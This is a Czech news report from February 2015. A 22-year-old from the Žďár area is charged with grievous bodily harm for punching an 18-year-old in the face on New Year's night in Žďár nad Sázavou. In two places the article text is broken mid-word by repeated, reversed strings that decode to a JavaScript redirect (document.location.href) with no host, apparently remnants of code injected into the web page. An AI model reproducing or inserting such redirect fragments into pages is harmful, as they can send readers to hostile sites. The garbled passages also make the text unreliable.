Rainbow page separator

Mladý muž je obviněn z těžkého ublížení na zdraví

Pátek, 13. února 2015

Policejní auto, policie, měření rychlosti

Žďár nad Sázavou / Trestní stíhání dvaadvacetiletého muže ze Žďárska zahájil vyšetřovatel kvůli vážnému zranění, které měl o silvestrovské noci ve Žďáře způsobit dalšímu mladíkovi. Obviněnému hrozí až deset let vězení.
„Ve čtvrtek 1. ledna sedmnáct minut po půlnoci přijali policisté na tísňové lince 158 oznámení o fyzickém napadení, ke kterému došlo na náměstí Republiky ve Žďáře nad Sázavou. Na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ihned vyjeli policisté obvodního oddělení a zjistili, že osmnáctiletý mladík byl napaden neznámým mužem, který mu způsobil vážné zranění v obličeji. Mladík byl zdravotníky převezen do brněnské nemocnice,“ informovala krajská policejní mluvčí Monika Pátková.
Policisté následně provedli prvotní šetření, zahájili úkony trestního řízení pro podezření ze spáchání trestného činu a začali po pachateli pátrat.
„Na základě provedených šetření, výslechů svědků a vyhodnocení dostupných informací se policistům podařilo pachatele vypátrat. Jedná se o dvaadvacetiletého mladíka ze Žďárska. Muž se přiznal k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že po krátké slovní rozepři poškozeného mladíka napadl údery pěstmi do obličeje a pak z místa odešel,“ dodala policejní mluvčí s tím, že vyšetřovatel muže obvinil ze zločinu těžkého ublížení na zdraví a přečinu výtržnictví. Obviněný je vyšetřován na svobodě, v případě prokázání viny mu hrozí trest odnětí svobody ve výši tři roky až deset let.